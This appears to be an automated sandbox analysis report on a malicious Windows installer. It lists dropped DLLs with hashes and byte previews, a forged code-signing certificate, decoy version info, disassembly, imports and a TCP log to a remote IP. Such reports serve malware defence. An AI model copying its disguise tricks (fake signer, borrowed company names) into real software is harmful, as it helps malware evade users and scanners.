..N..'.O..M..FW.o...C....+...,-.....~.............2.[....'..U.._.....]n..T......."....>O..Z....j_...&\|..............>.;q..B...L?.Mj^.bC..+k....)..M(.......#.G..S....\|7.oc:..o............I.g.;]...../..I....U.>.`.:._;...(....]...Y..=.....U'w..o......%.3...

C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48360
Entropy (8bit):	5.965995469374706
Encrypted:	false
SSDEEP:	768:nd5SYvW5+CSHhidc/bBIa5bEd/w+D0OLzfmIHlsCdcAtpz3bi0M2X9DhH:d5xvFCwoMbGObqw20oBzbv
MD5:	81B2D0C87D9BE5FF6BBC1496BFEDFB4D
SHA1:	25D20CB862DC6690579513F1E9976FC03FC310E3
SHA-256:	B29472664E91D182B26F2BF2BD2171A4ADDB7132417C644DBD2CCE446A86923C
SHA-512:	F5769BF4981ED6E6DBE48D853A4951A800EB010350B3D2F79020CD9C9957EC193CF00BFD146FCB3CCAAE8C4EF2E5A25AA99C9314168EE6F432376CE410B74F7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.........." ..0.............V.... ........... ....................................`.....................................O................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................8.......H.......xX..TZ...........................................................0...........{....o.....{.....6......{.....(....&(.....o......8...o....r...p....+A.......~....(....,....(.....+..r...po....-..{.....o ...r...p...X....i2..{.....0...........{....o.....{.....6.......{.....(....&(.....o....&(!....o......8...o".....8...o.......+B.....r...po....-7...8...%..=.o.........i.3........{......o .....X....i2..{......0.."....... ....s#........ .....(....&.o$...*...0../.......s%...&.r

C:\Users\user\AppData\Local\Temp\MsMpCom.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88912
Entropy (8bit):	5.81677879181799
Encrypted:	false
SSDEEP:	1536:dRN1t8CahRmSzbibA1i552+B4KTeloLYlUY4GCmatsSR4P1:ft8oA1U2+mKTeCWJCmatsSmN
MD5:	B26386F33FAA0FC72A8077622ACC31B8
SHA1:	C9ECDB2123AB56818E999BB24B11A704462B290B
SHA-256:	C469ED974F4CC5DAA6EE7607927D2DE4500EAEAAEE66B267254FE6742F064BEB
SHA-512:	04E91D57F6DA63CB8196163EFD6D5726EE216DF1C649FFDB62E93450B92ED09CBC032DAC3CD62D8FB723AA40E08727784256AF54BC9847C095B6BCBCD0A45AF2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H.............................................................................i.............Rich............PE..d.../*.$.........." ...........................e.............................p............`A................................................D........@.......0..4....:..P!...`..`.......T.......................(...................................................text...?........................... ..`.rdata...g.......h..................@..@.data...............................@....pdata..4....0......................@..@.rsrc........@......................@..@.reloc..`....`.......6..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ottawas.bmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PC bitmap, Windows 3.x format, 312 x 145 x 24
Category:	dropped
Size (bytes):	135774
Entropy (8bit):	6.91313068400418
Encrypted:	false
SSDEEP:	1536:GwfOK0U3CPBrtIu5/o0mrtd/Cl+DjS8Bn2C17WQ0SCoTsjwTxvXC0ntc9pKOIa58:LfObUqR2f7WQDTTxvXC0ntceOv7Wp
MD5:	3EEF656CBCA1AD683C0D205B8102AEEB
SHA1:	3601D8AEB56DA26777CFC229EDFB861A572CE78A
SHA-256:	A58CD5F1E7A2D07754798201CC1AC52E2BBC95AB2DA27E6F3556CCF50C719C2F
SHA-512:	F47676C91FD15160FB94C169FB9DC3361FE11F3E6C83AC2C6AFAF213DBAFD5875778C30A259E68CB491AE0EE99FA78EE6F68E60EC3094F4E09F8B83DD047D6CF
Malicious:	false
Preview:	BM^.......6...(...8...............(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse Filename: 7RsSycKaNc.exe, Detection: malicious, Browse Filename: 7RsSycKaNc.exe, Detection: malicious, Browse Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse Filename: Docs advice copy.exe, Detection: malicious, Browse Filename: Docs advice copy.exe, Detection: malicious, Browse Filename: Transferencia desde ING.exe, Detection: malicious, Browse Filename: Transferencia desde ING.exe, Detection: malicious, Browse Filename: shipping document.exe, Detection: malicious, Browse Filename: shipping document.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.generic.ml.1686.exe, Detection: malicious, Browse Filename: gunzipped.exe, Detection: malicious, Browse Filename: gunzipped.exe, Detection: malicious, Browse Filename: TT Aplication -Rp. 6.500,000_pdf.exe, Detection: malicious, Browse Filename: TT Aplication -Rp. 6.500,000_pdf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\touchpad-disabled-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	786
Entropy (8bit):	5.0885849275192205
Encrypted:	false
SSDEEP:	12:t4C8glnVOtgVbYc7nz6F0EcWLjD8Gok9kXYJOhz4AeWrGDT2Kd3ztU7jcd/M:t4CjlQ2d7+5f4YLJw4AeWrGDT/nvd0
MD5:	B87E230E52E6179805CA646953B97596
SHA1:	DBE5466CA50A929245C5A09E003392B791A9C075
SHA-256:	D04DC1EDF72A3DE271177575A7F552FB3FFF450D9F1D2A6316D0FC953E78739E
SHA-512:	68572EFFC6200DD8F5395F659686F9C7F33DBF3864E445DC4FD8088A25784E256EAC10B75965B10E03B2B634BD4E0E78A09EBAAFAF5447CA3A00AB0B25DD36F7
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <g fill="#2e3436">. <path d="M3.031 1a3 3 0 00-1.576.455l1.55 1.55c.01 0 .017-.005.026-.005h8.938C12.565 3 13 3.435 13 4.03V10h-3l1 1h2v.969c0 .298-.11.555-.293.738l1.402 1.402c.55-.549.891-1.306.891-2.14V4.03A3.038 3.038 0 0011.969 1zM.29 2.762C.11 3.149 0 3.577 0 4.032v7.937A3.038 3.038 0 003.031 15h8.938c.173 0 .34-.025.506-.053L10.527 13H8v-2h.527l-1-1H2V4.473zM2 11h5v2H3.031C2.435 13 2 12.565 2 11.969z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#bebebe" font-weight="400" font-family="Sans" overflow="visible"/>. <path d="M1.531.469L.47 1.53l14 14 1.062-1.062z"/>. </g>.</svg>.

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	5.79283030166378
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	562640
MD5:	2beb53482de8f6a713deb6fa9f9e7267
SHA1:	0959ea9b1697d980da699f8375f91ca1df8e0f56
SHA256:	7ac7845621113c87e927eb2b582af6f1809e4866e4ee0f089dd1c6ab0042dd27
SHA512:	0484ee70dc3a77c36c4d6c846f3937cfbf116c4c6b7516e72660bbac8f6b3dcb01dac478c615f08fb180c27018e08ff023f11bdf46ae622b9b188956983c5d3a
SSDEEP:	12288:gNpIr3H1Fwz2KXE+7uAyZDSJSrF1v5/tLDD8W1qpwBaM8Af1:gNpIr3H1Fwz2KXE+7uAyZDcSrF1v5/t7
TLSH:	37C44B284B26D4E5CC8F2DB48C43B29F67922E50BAAD8253D53074E5EBFC366C7A5C11
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	00f0f8e0ece07082

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="TRUISH Metaphysis BINDSAALER COUNTERPLEAD ", O=Countermarching, L=Gask, S=Scotland, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	10/05/2022 00:04:21 10/05/2023 00:04:21
Subject Chain	CN="TRUISH Metaphysis BINDSAALER COUNTERPLEAD ", O=Countermarching, L=Gask, S=Scotland, C=GB
Version:	3
Thumbprint MD5:	57E7BC9EC9D1474FF93F627A2D5F313A
Thumbprint SHA-1:	5C39BD33BBB4FB729C0C4634567294D7EDCB29F0
Thumbprint SHA-256:	C47A8A0C3B44E509CE176A357338FD2ADF724FE3389EA91AB0E6AB2804115F92
Serial:	07E4C4F966F11219

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F486D17B25Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F486D17B22Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x58810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x88f48	0x688	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	False	0.661534926471	data	6.43970794855	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.14577456407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.499348958333	data	4.01369865045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x1d000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x48000	0x58810	0x58a00	False	0.0791029398801	data	4.00672034737	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x48328	0x42028	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x8a350	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x9ab78	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x9d120	0x10a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x9e1c8	0xea8	data	English	United States
RT_ICON	0x9f070	0x988	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x9f9f8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x9fe60	0x100	data	English	United States
RT_DIALOG	0x9ff60	0x11c	data	English	United States
RT_DIALOG	0xa0080	0xc4	data	English	United States
RT_DIALOG	0xa0148	0x60	data	English	United States
RT_GROUP_ICON	0xa01a8	0x68	data	English	United States
RT_VERSION	0xa0210	0x2bc	data	English	United States
RT_MANIFEST	0xa04d0	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	Ashland Inc.
FileVersion	18.4.12
CompanyName	Ceridian Corp.
LegalTrademarks	Enron Corp.
Comments	Cinergy Corp.
ProductName	InstallScript Setup Launcher
FileDescription	Hovnanian Enterprises Inc.
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:06:35.536997080 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.537034988 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:35.537355900 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.555028915 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.555056095 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:35.861140013 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:35.861339092 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.861397028 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.963208914 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.963223934 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:35.963382006 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:35.963512897 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:35.967854023 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.010478973 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.140820980 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.140840054 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.141024113 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.141032934 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.141071081 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.141139030 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.141237020 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.284414053 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.284567118 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.284614086 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.284622908 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.284631968 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.284708023 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.284800053 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.284812927 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.284981012 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.366518021 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.366805077 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.366835117 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.429063082 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.429306030 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.429465055 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.429650068 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.429775000 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.430016041 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.430267096 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.430310011 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.430468082 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.430638075 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.430790901 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.430936098 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.430958986 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.431027889 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.431251049 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.431394100 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.431421995 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.431436062 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.431543112 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.510361910 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.510580063 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.510852098 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.575320005 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.575464010 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.575483084 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.575608969 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.575637102 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.575671911 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.575786114 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.575792074 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.575808048 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.576004028 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.576267958 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.576507092 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.576554060 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.576719046 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.576798916 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.576941013 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.576963902 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.576987028 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577028990 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577208996 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577234030 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577306986 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577383041 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577462912 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577485085 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577526093 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577583075 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577749014 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.577768087 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.577908993 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578063011 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578087091 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578104019 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578169107 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578244925 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578268051 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578398943 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578406096 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578453064 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578471899 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.578531027 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578546047 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578578949 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.578747034 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.610372066 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.610548019 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.610774040 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.654584885 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.654814005 CEST	49748	443	192.168.11.20	119.18.54.23
